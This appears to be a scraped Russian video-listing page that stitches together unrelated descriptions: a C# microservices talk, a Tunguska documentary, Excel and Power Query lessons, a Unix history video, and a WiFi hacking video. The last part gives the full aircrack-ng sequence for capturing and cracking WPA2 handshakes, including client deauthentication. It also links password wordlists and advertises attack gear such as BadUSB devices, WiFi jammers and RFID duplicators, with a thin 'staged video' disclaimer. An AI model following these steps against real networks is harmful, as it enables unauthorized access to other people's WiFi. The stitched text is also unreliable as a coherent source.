0.00
0 читателей, 4902 топика

Марк Шевченко — Микросервисы на C#


Марк Шевченко на Tver.io Backend Meetup 21 ноября.

Посмотрим на C# с точки зрения практики. Интересные для нас возможности языка — это деревья-выражений и async/await. Богатая библиотека позволит за считанные секунды подготовить каркас веб-приложения или создать миграцию базы.

Сравним микро-сервисный подход с другими распространёнными решениями: трёхзвенной и гексагональной архитектурами, чистой архитектурой Роберта Мартина и DDD. Узнаем, живёт ли C# в Linux и Docker. Подсказка: да, прекрасно живёт, и давно.

Немного поговорим о ползучей практике: что, как и в каком порядке. Придём к выводу, что C# для микро-сервисов — прекрасный выбор.

Ванавара, куда не добраться по земле | НЕИЗВЕСТНАЯ РОССИЯ


Ванавара — самый близкий к месту падения Тунгусского метеорита населенный пункт. Что-то около 60 километров. И немудрено. Ведь кроме этого маленького эвенкийского села, на сотни километров вокруг нет ничего, кроме глухой сибирской тайги. О том, что же случилось в июне 1908 года в районе реки Подкаменная Тунгуска, ученые всего мира спорят и по сей день. Да и жители самой Ванавары не прочь подискутировать о причинах невероятно мощного взрыва, повалившего деревья на тысячи километров вокруг и который сегодня принято называть Тунгусским метеоритом.

До Ванавары нельзя добраться по земле. В этих местах нет автомобильных дорог, сюда не ходят поезда. Единственный способ сообщения с внешним миром — малая авиация. В селе есть свой аэродром, на который несколько раз в неделю садятся винтовые самолёты. Которые доставляют сюда не только людей, но и всё необходимое для выживания в этом глухом сибирском селе.

***

Подпишись на НАСТОЯЩЕЕ ВРЕМЯ.ДОК — youtube.com/CurrentTimeDOC

#Тунгусский_метеорит #вырубка_леса #тайга

Выпадающий список с пополнением


Как создать выпадающий список с двусторонней связью со справочником и возможностью пополнения в будущем. Скачать пример www.planetaexcel.ru/techniques/1/35/
Заходите в гости ↓↓↓
Twitter twitter.com/planeta_excel
Facebook www.facebook.com/planetaexcel
Instagram www.instagram.com/planetaexcel/
Мои книги planetaexcel.ru/books/
Моя надстройка PLEX ( 150 новых функций для вашего Excel) planetaexcel.ru/plex/

Продвинутая аналитика в Excel: сводные и диаграммы


Карьерная консультация по обучению:
bit.ly/2RB2Oow

Файл для работы:
drive.google.com/open?id=1zIqOJqrl46pmOxDL7YTchuQHNfEkUyLk

Ведущий вебинара: Николай Белоусов
Сайт: yourpartner.agency
Facebook: www.facebook.com/nbelousov
Instagram: instagram.com/pro_nb

Урок 5. Форматы столбцов в Power Query


У каждого столбца в Power Query должен быть правильный формат, иначе не избежать ошибок. В уроке показано, как задавать или изменять формат столбцов. Также показано, как работать с данными, сохраненными в других локальных настройках.

Файл с примером и другие уроки о Power Query по ссылке statanaliz.info/uroki-power-query/

► Корпоративный тренинг «Продвинутый уровень MS Excel»:
statanaliz.info/trening-prodvinutyj-uroven-ms-excel/

► Онлайн курс «Продвинутый уровень MS Excel»:
statanaliz.info/kurs-prodvinuty-uroven-excel/

**************************

*** Мой сайт об Excel и статистике ***
statanaliz.info/

*** Странички и аккаунты в соцсетях ***
Facebook: https://www.facebook.com/statanaliz.info/
Вконтакте: https://vk.com/id_statanaliz_info
Твиттер: https://twitter.com/statanaliz_info
Telegram: t.me/statanaliz

История Unix. Часть 2: BSD Unix


Вторая часть истории самой знаменитой и важной операционной системы в мире — Unix. В этот раз рассмотрим историю потомков Unix по линии BSD

Поддержите наш скромный канал: donatepay.ru/donation/goldenplay
Группа в ВК: vk.com/retrogames1

{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind


✓ Наш канал в Телеграме: durov.cc/under_public

ali.pub/35zes7 — Недорогой хакерский смартфон поддерживающий Kali Linux
youtu.be/ZJ0StG_o9yI — Лучший генератор словарей для брута

● В этом ролике я покажу, что ни одну WiFi сеть нельзя считать защищенной. Так как проверка моей сети показала то, что доступ к сети может получить кто угодно. В этом ролике я покажу, как я это сделал.
● Это постановочный ролик, не имеющий никакого отношения к реальной жизни. Всё происходящее в ролике — выполнено используя средства монтажа. Всё происходящее в ролике — творческая выдумка автора. Все действия придуманы, а любые наименования ПО — вымышленны. Любые сходства с реальностью — не более чем случайность. В реальной же жизни, любые подобные действия строго запрещены! Исключением является цель проверки системы на безопасность, получив одобрение владельца сети.

● Снял продолжение: брутфорс со скоростью до 500 000 тыс паролей в секунду используя видеокарту: goo.gl/HbDh8i

● Порядок команд:
— ifconfig
— airmon-ng check kill
— airmon-ng start wlan0
— airodump-ng wlan0mon
— airodump-ng --bssid [MAC адрес точки доступа – без скобок!] --channel 1 -w wifi wlan0mon
— aireplay-ng --deauth 20 -a [MAC точки доступа] -c [MAC подключенного клиента] wlan0mon
— wpaclean ИмяНовогоФайла ИмяСтарогоФайла
— aircrack-ng -w [ПутьКСловарю] -b [MAC точки доступа] [ЧистыйХэндшейк .cap]

● Набор словарей:
goo.gl/z7mnhf — Даты, использовать первым
goo.gl/4BBPQy — Номера Телефонов RUS, использовать вторым
goo.gl/bVsfo2 — Элитный словарь от InsidePRO
goo.gl/Ab2fTE — Дополнительный словарь на 9 млн. слов

— ● Помочь каналу и получить помощь в любых вопросах: donationalerts.com/r/undermind
● Стать спонсором канала: youtube.com/TheUnderMind/join
● Я ВКонтакте: vk.com/TheUnderMind
● Реклама на канале: bit.ly/2THIswk

— ✓ Наш сайт: darksploit.su
✓ Наш второй канал: vk.cc/9Nuba7
✓ Паблик в ВК: vk.cc/aby9hC
✓ Чат в ВК: vk.cc/abxUPr
✓ Паблик в Телеграме: durov.cc/under_public
✓ Чат в Телеграме: durov.cc/UnderChats

— ● Лучшие товары для xaЦkера:

✓ Мой хаЦкepcкий смартфон для Kali Linux (Nethunter и поддержкой правильного ядра) — ali.pub/35zes7

✓ Alfa — Лучший WiFi Адаптер (работает в Kali Linux и Nethunter): goo.gl/sv7Vuf

✓ ХаЦкерские часы-деаутентификатор с WiFi: ali.pub/4hhw62

✓ НасkRF Оnе — лучший SDR: ali.pub/4hhwsm

✓ Маленькая Bluetooth-клавиатура с подсветкой: ali.pub/4hhwwp

✓ USB порт для вашего смартфона (OTG Micro USB): goo.gl/H7pLVT

✓ WiFi Jаmmеr на ESP8266 (Глушилка-Деавторизатор WiFi): goo.gl/i7VHWP

✓ Злo Кaбель (BadUSB): ali.pub/4hhyo3

✓ Raspberry PI 3 B (можно сделать xaцk-станцию): ali.pub/4hhwzt

✓ Ruby Ducky BadUSB (XaЦkepcкий девайс в виде флешки): ali.pub/4hhxn5

✓ USB to Ethernet адаптер: ali.pub/4hhxux

✓ Разветвитель USB порта 1 в 4: goo.gl/pBoQPW

✓ Дубликатор RFID ключей и карт: goo.gl/snvemZ

✓ Дубликатор RFID / NFC, редактор кодов: ali.pub/4hhy1q

✓ Недорогие, но очень мощные рации: goo.gl/dKibg5

✓ Недорогой, но мощный WiFi адаптер: goo.gl/c5eWga

✓ Микро камера: ali.pub/4hhy49

✓ Клавиатуры с подсветкой для ПК: ali.pub/4hhyav

✓ Коврик для мыши с подсветкой: ali.pub/4hhycm

— ● В ролике "{100%} Как взломать любой WiFi? | WPA2 | Kali Linux | Как защититься от взлома? | UnderMind" — я рассказываю об информационной безопасности. И о реальной уязвимости всех сетей. Существует множество способов получения доступа к сети WiFi, в том числе социальная инженерия или уязвимости в WPS, но об этом как-нибудь в другой раз. И сейчас поговорим о самом надежном (на мой взгляд) методе, который сработает со 100% вероятностью.

● Сама проверка у нас подразделяется на 2 части. Первая: это захват хендшейка или рукопожатия. В понятии WiFi сетей это что-то вроде «Привет, чувак. Подключи меня», «Привет. Какой пароль?», «Пароль: Блаблабла». Мы прослушиваем эти данные, но поскольку пароль передается в зашифрованном виде, мы переходим ко второму этапу. А именно: к расшифровке хендшейка.
Всё делать мы будем на Kali Linux.
Первой командой смотрим интерфейс нашего WiFi адаптера
ifconfig
Выбираем тот, который отвечает за WiFi, это как правило самый последний.
Переводим наш WiFi адаптер в режим монитора. В этом режиме он будет ловить все пакеты WiFi, даже предназначенные другим устройствам. Делаем это командой:
Продолжение в ролике…

● Дополнительные хештеги:
#взлом #wifi #вайфай #хак #hack #vk #взломать #kali #linux #under #андер #undermind